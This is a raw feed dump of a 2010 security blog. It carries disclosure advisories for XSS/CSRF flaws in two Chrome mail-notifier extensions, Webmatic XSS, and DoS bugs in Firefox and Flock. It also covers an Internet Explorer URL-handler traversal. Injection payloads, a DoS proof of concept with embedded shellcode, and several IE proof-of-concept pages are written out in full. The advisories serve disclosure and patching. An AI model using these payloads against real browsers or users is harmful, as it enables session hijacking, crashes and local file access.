src="http://feedads.g.doubleclick.net/~a/-8cV8obUe16QnKqbjJ2QE8nmqDE/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/V3H1PicQBho" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/06/google-services-notifier-chrome.htmltag:blogger.com,1999:blog-9011578.post-66982440680363871822010-06-18T20:32:00.002+02:002010-06-18T20:34:56.568+02:002010-06-18T20:34:56.568+02:00######################################<br /> Notifier for Google Wave Chrome extension XSS/CSRF<br /> extension:https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb<br /> advisore:http://lostmon.blogspot.com/2010/06/notifier-for-google-wave-chrome.html<br /> Exploit available:yes vendor notify : NO<br /> #######################################<br /> <br /> So in this case "Notifier for Google Wave Chrome" <br /> has a flaw that allow attackers to make XSS style attacks.<br /> <br /> All extensions runs over his origin and no have way to altered data from extension <br /> or get sensitive data like , email account or password etc..<br /> <br /> if we look how many users have instaled this extension =&gt;<br /> https://chrome.google.com/extensions/detail/aphncaagnlabkeipnbbicmcahnamibgb<br /> 56,542 users have instaled it (WoW)<br /> <br /> ############<br /> explanation<br /> ############<br /> <br /> Notifier for Google Wave allows users to view wen they have a new wave and<br /> view a preview of it ....<br /> <br /> If a attacker compose a new wave with html or javascript code in <br /> body & send it to victim´s the code is executed wen Victim´s click in the<br /> extension to view a preview of wave.<br /> <br /> So for exploit we need to compose a "special" wave<br /> for example if we put directly in the mail body a iframe like<br /> "&gt;&lt;iframe src="javascript:alert(location.href);"&gt;&lt;/iframe&gt;<br /> in the two cases the alert is executed wen try to preview the wave <br /> with the extension :) it is executed in context location.href value is<br /> "about:blank"<br /> <br /> For example send a wave With a logout acction in google wave in body<br /> "&gt;&lt;iframe src="https://wave.google.com/wave/logout"&gt;&lt;/iframe&gt;<br /> it closes the sesion on google wave , this is a CSRF.<br /> <br /> ######################€nd#################################<br /> .<br /> <br /> Thnx for your time !!!<br /> <br /> atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-6698244068036387182?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/RavGMj5krb8ot4496sQYAQKv6aM/0/da"><img src="http://feedads.g.doubleclick.net/~a/RavGMj5krb8ot4496sQYAQKv6aM/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/RavGMj5krb8ot4496sQYAQKv6aM/1/da"><img src="http://feedads.g.doubleclick.net/~a/RavGMj5krb8ot4496sQYAQKv6aM/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/LT3iORvbbuM" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/06/notifier-for-google-wave-chrome.htmltag:blogger.com,1999:blog-9011578.post-83709628367092526922010-06-17T20:56:00.003+02:002010-06-22T13:50:38.785+02:002010-06-22T13:50:38.785+02:00######################################<br /> Gmail Checker plus Chrome extension XSS/CSRF II<br /> extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe<br /> advisore:http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension.html<br /> Exploit available:yes vendor notify: NO<br /> #######################################<br /> <br /> So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)<br /> has a flaw that allow attackers to make XSS style attacks.<br /> <br /> All extensions runs over his origin and no have way to altered data from extension <br /> or get sensitive data like , email account or password etc..<br /> <br /> if we look how many users have instaled this extension =&gt;<br /> https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe<br /> 303,711 users have instaled it (WoW)<br /> <br /> ############<br /> explanation<br /> ############<br /> <br /> Google Mail Checker Plus allows users to view wen they have a new mail and<br /> view a preview of the mail ....<br /> <br /> If a attacker compose a new mail with html or javascript code in mail <br /> body & send it to victim´s the code is executed wen Victim´s click in the<br /> extension to view a preview of mail.<br /> <br /> So for exploit we need to compose a "special" mail <br /> for example if we put directly in the mail body a iframe like<br /> "&gt;&lt;iframe src="javascript:alert(location.href);"&gt;&lt;/iframe&gt;<br /> the extension shows this code in plain text and the alert isn´t executed...<br /> them we need to use a Feature from gmail ( auto conver links in clicable urls)<br /> them we can compose a email body with a http link like<br /> http://"&gt;&lt;iframe src="javascript:alert(location.href);"&gt;&lt;/iframe&gt;<br /> or compose a mail link like :<br /> lalala@"&gt;&lt;iframe src="javascript:alert(location.href);"&gt;&lt;/iframe&gt;.com<br /> in the two cases the alert is executed wen try to preview the email <br /> with the extension :) it is executed in context location.href value is<br /> "about:blank"<br /> <br /> <br /> Gmail is a safe place , but the extensions to manage it, can be a potential<br /> vector to attack.<br /> <br /> For example send a email With a logout acction in gmail in body<br /> http://"&gt;&lt;iframe src="https://mail.google.com/mail/?logout&hl=es"&gt;&lt;/iframe&gt;<br /> it closes the sesion on gmail , this is a CSRF.<br /> also if the user has mark option to show notifications on desktop this issue execute the iframe too in the desktop notifications window and can cause to a denial of service of extension, for example if the victim´s try to change any option in options page from extension :P<br /> <br /> So we have dispute it in http://code.google.com/p/chromium/issues/detail?id=45401<br /> The developer has release a patch version in trunk for other issues what i disclose before<br /> see for references for previous vulns =&gt; OSVDB ID :65459 and OSVDB ID: 65460<br /> previous patch =&gt;<br /> http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js<br /> and see diff =&gt; http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0<br /> <br /> <strike>I release it as 0-day and no notify to vendor because<br /> in the previous issues , he patch the vulns and don´t <br /> make any reference to it and stealing credits on discover<br /> Them i release this new vulns without notify developer :)</strike><br /> <br /> <b>UPDATED</b> :Now the extension in about secition reflects the vulnerability and credit it to me :)<br /> <br /> <br /> <br /> ######################€nd#################################<br /> .<br /> <br /> Thnx for your time !!!<br /> <br /> atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-8370962836709252692?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/BkGgNFBbUZn8XSiVgQWySbty-o0/0/da"><img src="http://feedads.g.doubleclick.net/~a/BkGgNFBbUZn8XSiVgQWySbty-o0/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/BkGgNFBbUZn8XSiVgQWySbty-o0/1/da"><img src="http://feedads.g.doubleclick.net/~a/BkGgNFBbUZn8XSiVgQWySbty-o0/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/dLO7FT9eadY" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension.htmltag:blogger.com,1999:blog-9011578.post-45655821083304091502010-06-03T11:56:00.004+02:002010-06-15T13:51:23.151+02:002010-06-15T13:51:23.151+02:00######################################<br /> Gmail Checker plus Chrome extension XSS<br /> extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe<br /> advisore:http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html<br /> Exploit available:yes<br /> #######################################<br /> <br /> So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)<br /> has a flaw that allow attackers to make XSS style attacks.<br /> <br /> <b>All extensions runs over his origin and no have way to altered data from extension or get sensitive data like , email account or password etc..</b><br /> <br /> if we look how many users have instaled this extension =><br /> https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe<br /> 303,711 users have instaled it (WoW)<br /> <br /> ############<br /> explanation<br /> ############<br /> <br /> Google Mail Checker Plus allows users to view wen they have a new mail and<br /> view a preview of the mail ....<br /> <br /> if a attacker compose a new mail with html or javascript code in subject form field and send it to victim´s the code is executed wen Victim´s click in the extension to view the mail and wen victim´s accept the alert and view a preview of mail the iframe is executed too.<br /> <br /> Gmail is a safe place , but the extension to manage it can be a potential<br /> vector to attack it.<br /> <br /> For example send a email With a logout acction in gmail in subject<br /> "&gt;&lt;iframe src="https://mail.google.com/mail/?logout&hl=es"&gt;&lt;/iframe&gt;<br /> it closes the sesion on gmmail , this is a XSRF , and , in the case what you say aa<br /> it is executed in context and the location.href value is "about:blank" <br /> <br /> So we have dispute it in http://code.google.com/p/chromium/issues/detail?id=45401<br /> The developer has release a patch version in trunk => <br /> http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js<br /> please donload it and copy to your extension folder to solve it.<br /> <br /> See Diff => http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0<br /> <br /> ######################€nd#################################<br /> .<br /> <br /> Thnx for your time !!!<br /> <br /> atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-4565582108330409150?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/EmEWhRuIfcqbMc_pb8lpWo6roXY/0/da"><img src="http://feedads.g.doubleclick.net/~a/EmEWhRuIfcqbMc_pb8lpWo6roXY/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/EmEWhRuIfcqbMc_pb8lpWo6roXY/1/da"><img src="http://feedads.g.doubleclick.net/~a/EmEWhRuIfcqbMc_pb8lpWo6roXY/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/V4qqQ28Edd0" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.htmltag:blogger.com,1999:blog-9011578.post-58853548463029396222010-04-09T23:30:00.001+02:002010-04-09T23:33:50.778+02:002010-04-09T23:33:50.778+02:00##################################<br /> Firefox 3.6.2 & 3.6.3 and flock 2.5 browsers uncaught excepcion<br /> error console DoS<br /> Vendor URL:http://www.mozilla.com<br /> vendor URL:http://www.flock.com/<br /> Advisore:http://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.html<br /> ###################################<br /> <br /> Firefox and Flock Browsers can hang with a malformed page,<br /> and wen try to view error console firefox and flock crash <br /> due to a uncaught excepcion and this is a out of memory <br /> error.<br /> <br /> <br /> ################<br /> Versions<br /> ################<br /> <br /> firefox 3.6.2 and 3.6.3 vulnerable<br /> Bugzilla:<br /> https://bugzilla.mozilla.org/show_bug.cgi?id=557228<br /> <br /> Flock 2.5 vulnerable<br /> <br /> <br /> #################<br /> Proof of Concept<br /> #################<br /> &lt;html&gt;<br /> &lt;head&gt;<br /> &lt;title&gt; Bad 'throw' exception Remote DoS Flock browser 2.5 firefox 3.6.2 & 3.6.3&lt;/title&gt;<br /> &lt;/head&gt;<br /> &lt;body onload="javascript:alert('Please Press Ctrl+Shift+J');"&gt;<br /> &lt;script language='JavaScript'&gt;<br /> var n=unescape('%uf1a4%u7ffd');<br /> &lt;!-- variant var n=unescape('%uc0c0%uc0c0%uc0c0'); --!&gt;<br /> &lt;!-- Shellcode calc.exe but does not work --!&gt;<br /> var s=unescape('%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucf75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ffÌ');<br /> for(var i=0;i&lt;64;i++){<br /> n=n+n;<br /> document.write('&lt;script&gt;throw n+s;&lt;/scr'+'ipt&gt;');<br /> }<br /> &lt;/script&gt;<br /> &lt;/head&gt;<br /> &lt;body&gt;<br /> &lt;center&gt;&lt;h1&gt; Bad 'throw' exception Remote DoS on firefox 3.6.x and Flock browser 2.5 &lt;/h1&gt;<br /> &lt;h3&gt;Based on the exploit from &lt;a href="http://hacksafe.blogspot.com/"&gt;Nishant Das Patnaik&lt;/a&gt;&lt;br /&gt;<br /> Exploit modified by &lt;a href="http://lostmon.blogspot.com"&gt;Lostmon&lt;/a&gt; Lostmon@gmail.com to affects Flock and Firefox.<br /> Remember to press ctrl+shift+j and make sure that your console log is in "all" tab or in "errors" tab , in firefox and flock :)&lt;/h3&gt;<br /> <br /> &lt;/center&gt;&lt;/body&gt;<br /> &lt;/html&gt;<br /> <br /> <br /> <br /> ###################€nd ##########################<br /> <br /> Thns to estrella to be my ligth<br /> -- <br /> atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-5885354846302939622?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/F7FsPmf5X2NMc4Zjy1RudbMRv5w/0/da"><img src="http://feedads.g.doubleclick.net/~a/F7FsPmf5X2NMc4Zjy1RudbMRv5w/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/F7FsPmf5X2NMc4Zjy1RudbMRv5w/1/da"><img src="http://feedads.g.doubleclick.net/~a/F7FsPmf5X2NMc4Zjy1RudbMRv5w/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/eYIMi21WQU8" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.htmltag:blogger.com,1999:blog-9011578.post-62869881072600318892010-04-01T16:33:00.002+02:002010-04-01T16:34:43.885+02:002010-04-01T16:34:43.885+02:00############################################<br /> Flock browser marquee tag DoS <br /> advisore:http://lostmon.blogspot.com/2010/04/flock-browser-marquee-tag-dos.html<br /> ############################################<br /> <br /> <br /> Flock browser contains a flaw that may allow a remote denial of service.<br /> The issue is triggered when an Victim visit a specially crafted web page<br /> with a lot of marquee html tag and it will result in loss of availability<br /> ( DoS ) for Browser and posible memory corruption.<br /> <br /> This bug was first discover by '599eme Man flouf@live.fr' and this <br /> is a extended research about it, he was discovered in those browsers:<br /> Opera 10.10<br /> Firefox 3.5.7<br /> Safari 4.0.4<br /> SeaMonkey 2.0.1<br /> <br /> and i test it in :<br /> <br /> Flock Browser 1.2.6 vulnerable<br /> Flock Browser 2.5 vulnerable<br /> <br /> a sample code can be found/download here => <br /> http://www.exploit-db.com/exploits/11347<br /> <br /> ########################€nd ###################<br /> <br /> Thns to estrella to be my ligth<br /> -- <br /> atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-6286988107260031889?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/vNw2cqWz-b94hIXs4SyzH5CZxyI/0/da"><img src="http://feedads.g.doubleclick.net/~a/vNw2cqWz-b94hIXs4SyzH5CZxyI/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/vNw2cqWz-b94hIXs4SyzH5CZxyI/1/da"><img src="http://feedads.g.doubleclick.net/~a/vNw2cqWz-b94hIXs4SyzH5CZxyI/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/IilmW1EfhVY" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/04/flock-browser-marquee-tag-dos.htmltag:blogger.com,1999:blog-9011578.post-58817057575883416022010-03-19T15:03:00.002+01:002010-03-19T15:06:05.834+01:002010-03-19T15:06:05.834+01:00#################################<br /> Webmatic 3.0.3 Multiple cross.site scripting<br /> Vendor URL:http://www.valarsoft.com/<br /> Advisore: http://lostmon.blogspot.com/2010/03/webmatic-303-multiple-crosssite.html<br /> Vendor notified: YES<br /> #################################<br /> <br /> Webmatic contains a flaw that allows a remote cross site<br /> scripting attack. This flaw exists because the application<br /> does not validate multiple variables and form fields upon<br /> submission to the 'index.php' script. This could allow a <br /> user to create a specially crafted URL that would execute<br /> arbitrary code in a user's browser within the trust relationship<br /> between the browser and the server, leading to a loss of integrity.<br /> <br /> <br /> ##############<br /> Versions<br /> ##############<br /> <br /> valarsoft webmatic 3.0.3<br /> <br /> It´s posible that prior versions<br /> are afected<br /> <br /> <br /> ################<br /> TimeLIne<br /> ##############<br /> <br /> Discovered 13-01-2010<br /> Vendor notify: 14-03-2010<br /> vendor response:15-03-2010<br /> Disclosure: 19-03-2010<br /> <br /> ###############<br /> Private messages<br /> ################<br /> <br /> Subject field form is vulnerable<br /> <br /> a attacker can compose a PM with a malformed title<br /> and it is executed wen the victims view his inbox <br /> or open the PM.<br /> <br /> <br /> #################<br /> Forums<br /> #################<br /> <br /> Search field form ,filer variable<br /> and title form field affected.<br /> <br /> a attacker can compose a post with a malformed title<br /> and wen a victim try to browse the forum the xss is <br /> executed, also the attacker can compose a search url<br /> with xss in filter variable or put the xss in search<br /> form field to execute it.<br /> <br /> ##################<br /> Chat room<br /> ###################<br /> <br /> Nickname form field affected<br /> <br /> a attacker can use a malformed nick name with xss and<br /> wen he join in a channel the xss is executed in all<br /> channel´s users.<br /> <br /> ######################<br /> News<br /> ####################<br /> <br /> Title form filed affected<br /> <br /> a attacker can compose a new with a malformed title and <br /> wen a user browse the news sections the xss is executed<br /> also if the new has a "resume" in home page, all users <br /> wen load the page are afected by xss.<br /> <br /> pg variable affected<br /> <br /> a attacker can compose a malformed URL in news sections and <br /> insert some xss code in 'pg' variable , wen a victim clink in<br /> this url the xss is executed.<br /> <br /> #########################<br /> banners section<br /> #########################<br /> <br /> Title and label form fields<br /> <br /> A remote user can add a banner<br /> with a malformed title or/and malformed label<br /> wen the attacker visit his banner the xss is executed<br /> in his own banner management.<br /> Also if a victim visit this banner the xss is executed.<br /> <br /> ############################€ND#############################<br /> <br /> Thns to estrella to be my ligth<br /> -- <br /> atentamente:<br /> Lostmon (lostmon@gmail.com)<br /> Web-Blog: http://lostmon.blogspot.com/<br /> Google group: http://groups.google.com/group/lostmon (new)<br /> --<br /> La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-5881705757588341602?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/_j1DBsVo18rUtOEmtBkKDBY5Cqg/0/da"><img src="http://feedads.g.doubleclick.net/~a/_j1DBsVo18rUtOEmtBkKDBY5Cqg/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/_j1DBsVo18rUtOEmtBkKDBY5Cqg/1/da"><img src="http://feedads.g.doubleclick.net/~a/_j1DBsVo18rUtOEmtBkKDBY5Cqg/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/MV-1aj07mbI" height="1" width="1"/>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comhttp://lostmon.blogspot.com/2010/03/webmatic-303-multiple-crosssite.htmltag:blogger.com,1999:blog-9011578.post-79071247627386588002010-02-10T21:01:00.007+01:002010-02-10T21:23:18.558+01:002010-02-10T21:23:18.558+01:00############################################<br />Internet explorer 7 & 8 url validation vulnerability<br />Original Advisore: http://lostmon.blogspot.com/<br />2010/02/internet-explorer-7-8-url-validation.html<br />Vendor URl: http://www.microsoft.com<br />related adv:http://lostmon.blogspot.com/<br />2010/02/internet-explorer-6-7-8-url-validation.html<br />related bulletin: MS10-002 and ms10-007<br />Related CVE 2010-0027<br />Related OSVDB ID: 62245 and 62245 <br />Related Secunia: SA38501 and SA38209<br />Related BID: 37884<br />############################################<br /><br /><br />############<br />Description<br />############<br /><br /><br />A remote code execution vulnerability exists in the way<br />that Internet Explorer incorrectly validates input. An<br />attacker could exploit the vulnerability by constructing<br />a specially crafted URL. When a user clicks the URL, the<br />vulnerability could allow remote code execution. An<br />attacker who successfully exploited this vulnerability<br />could gain the same user rights as the logged-on user.<br />If a user is logged on with administrative user rights,<br /><br /><br />#################<br />Versions afected<br />#################<br /><br />I have tested in Internet Explorer 7 & 8<br />in this versions of windows<br /><br />All versions of Windows 7<br />Windows xp home<br />Windows xs pro<br /><br />So you can look the explotability index<br />From Relared Microsoft bulletin to get<br />a complete List of products affected.<br /><br />#############<br />Timeline<br />#############<br /><br />discovered 05-11-2009<br />Reported to vendor 15-11-2009<br />Vendor response:15-11-2009<br />vendor accepts in case manager 19-11-2009<br />vendor patch 21-01-2010<br />Vendor Patch2:09-02-2010<br />Public Disclosure: 21-01-2010<br />Details Disclosure:10-02-2010<br /><br /><br />##############<br />Solution<br />##############<br /><br />See <br />http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx<br />and <br />http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx<br /><br />for more details and for download vendor's patch<br /><br />#######################<br />Sample code and PoC´s<br />#######################<br /><br />This Vulnerability is bassed in the way<br />that Internet explorer validate Uri handlers<br />and the special chart '#'<br /><br />for testing and undestanding first open internet explorer<br />and write in teh address bar a fake handler like `handler:' <br />it cause that IE shows 'res://ieframe.dll/unknownprotocol.htm'<br />internal page , because the protocol is unknow.<br />if we do => handler:http://[some-host]' Ie wait to open <br />the host, but don´t show any error or unknow protocol <br />error page.<br /><br />If we Write at the adrress bar 'handler:handler2:'<br />IE shows again 'res://ieframe.dll/unknownprotocol.htm' page.<br /><br />But if we concatenate two unknow protocol handlers and <br />use the special char '#' like 'handler:handler#:'<br />internet explorer shows a alert warning<br />with 'internet explorer can´t find file:///'<br /><br />With this convination IE use file: protocol handler.<br /><br />With this alert we can think... if we concatenate two handlers and #<br />char and a file path we can access to files on the hard disk.<br /><br />"handler:handler#:c:\windows\calc.exe'<br />But we get again 'internet explorer can´t find the file'<br /><br />Them we look for trasversal file access like<br />handler:handler#:../../../../C:\windows/calc.exe’<br />Them Ie promp us to download or execute the file.<br />we have bypass the restrictions!!!<br /><br />so we are working in the address bar<br />Can a web page use this issue to make the same and ask<br />for download it ? YES<br /><br />we can construct a web page with a iframe like:<br /><br />############# PoC one #################<br />&lt;html&gt;<br />&lt;iframe id="myIframe"<br />src="handler:handler#:../../../../C:\windows/calc.exe"></iframe&gt;<br />&lt;/html&gt;<br />################# EOF #################<br /><br />If we open it via local folder, or via local server or<br />lan server or remote server, in all cases iE ask for download<br /><br />them we can access any file in the hard disk so<br />can we execute or read the content of a file ?? YES<br /><br />if we know a txt file path we can do similar<br />( put a txt file in c: root and wite some content it)<br />and them :<br /><br />############## PoC Two #############<br />&lt;html&gt;<br />&lt;iframe id="myIframe"<br />src="handler:handler#:../../../../C:\our_txtfile.txt"></iframe&gt;<br />&lt;/html&gt;<br /><br />############# EOF #################<br /><br />wen we open this Poc , it read the content from our_txtfile.txt<br />and show it in the frame.<br /><br /><br />we can execute files ?? YES<br /><br />we can execute a html file or xml file or search-ms files<br />from hard disk for example:<br /><br />############# PoC Tree ###############<br />&lt;html&gt;<br />&lt;iframe id="myIframe"<br />src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"><br />&lt;/iframe&gt;<br />&lt;/html&gt;<br /><br />############### EOF ###########<br /><br />if we look it executes Explorer with a local search :D<br /><br /><br />can we read the content of any file and upload it to a server or<br />manage the content ??<br /><br />i don´t have found a way to do it<br />all times internet explorer denies the access to the content from<br />iframe.<br /><br />############# PoC four ##############<br /><br />&lt;html&gt;<br />&lt;head&gt;<br />&lt;/head&gt;<br /> &lt;body&gt;<br />&lt;script type="text/javascript"><br />function getContentFromIframe(iFrameName)<br />{<br /> var myIFrame = document.getElementById(iFrameName);<br /> var content = myIFrame.contentWindow.document.body.innerHTML;<br /> alert('content: ' + content);<br /><br /> content = 'change iframe content';<br /> myIFrame.contentWindow.document.body.innerHTML = content;<br />}<br />&lt;/script&gt; &lt;iframe id="myIframe"<br />src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"&gt;&lt;/iframe&gt;<br /><br /> &lt;a href="#" onclick="getContentFromIframe('myIframe')"&gt;Get the content&lt;/a&gt;<br /><br />&lt;/body&gt;<br />&lt;/html&gt;<br /><br />##################### EOF #############################<br /><br />it give a access deniet error<br />if we look to use XMLHttpRequest()<br /><br />it does not work again and access is denied:<br /><br />########### PoC Five ######################<br />var contents;<br />var req;<br />req = new XMLHttpRequest();<br />req.onreadystatechange = processReqChange;<br />req.open(’GET’,<br />‘handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms’,<br />true);<br />req.send(”);<br />############ EOF #############<br /><br />if we use it as a activex it<br />shows again a access denied :P<br /><br />############### PoC six #############<br /><br />&lt;html&gt;&lt;body&gt;&lt;div&gt;<br /><br />&lt;script&gt;<br />function getHTTPObject()<br />{<br /> if (typeof XMLHttpRequest != 'undefined')<br /> {<br /> return new XMLHttpRequest();<br /> }<br /> try {<br /> return new ActiveXObject("Msxml2.XMLHTTP"); }<br /> catch (e)<br /> {<br /> try<br /> {<br /> return new ActiveXObject("Microsoft.XMLHTTP");<br /> }<br /> catch (e) {}<br /> }<br /> return false;<br />}<br />x = getHTTPObject();<br />x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false);<br />x.send(null);<br />alert(x.responseText);<br /><br />&lt;/script&gt;<br /><!-- end of input --><br />&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;<br /><br />################ EOF ######################<br /><br />Them we can think that we can read txt files , execute html,xml<br />search-ms files , and download and execute Binaries files from the<br />victims hard disk , only with view a crafted web page.<br /><br />Microsoft has pached it and has release a secutiry bulletin<br />that solve this issue see <br />http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx<br />and<br />http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx<br />for details and for download the security update that solve this <br />issue and seven vulnerabilities more.<br /><br />#################### €nd ################<br /><br />Thnx to Google security Team for his support<br />Thnx to MSRC for his support and acknowledgments<br />Thnx To icar0 & sha0 from Badchecksum<br />Thnx To Brink For test with me in some windows :D<br />Thns to estrella to be my ligth<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....<img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-7907124762738658800?l=lostmon.blogspot.com' alt='' /></div> <p><a href="http://feedads.g.doubleclick.net/~a/FEj9jFMZgUUjaNAn6fYIL380lYw/0/da"><img src="http://feedads.g.doubleclick.net/~a/FEj9jFMZgUUjaNAn6fYIL380lYw/0/di" border="0" ismap="true"></img></a><br/> <a href="http://feedads.g.doubleclick.net/~a/FEj9jFMZgUUjaNAn6fYIL380lYw/1/da"><img src="http://feedads.g.doubleclick.net/~a/FEj9jFMZgUUjaNAn6fYIL380lYw/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/VnwMxafkBfY" height="1" 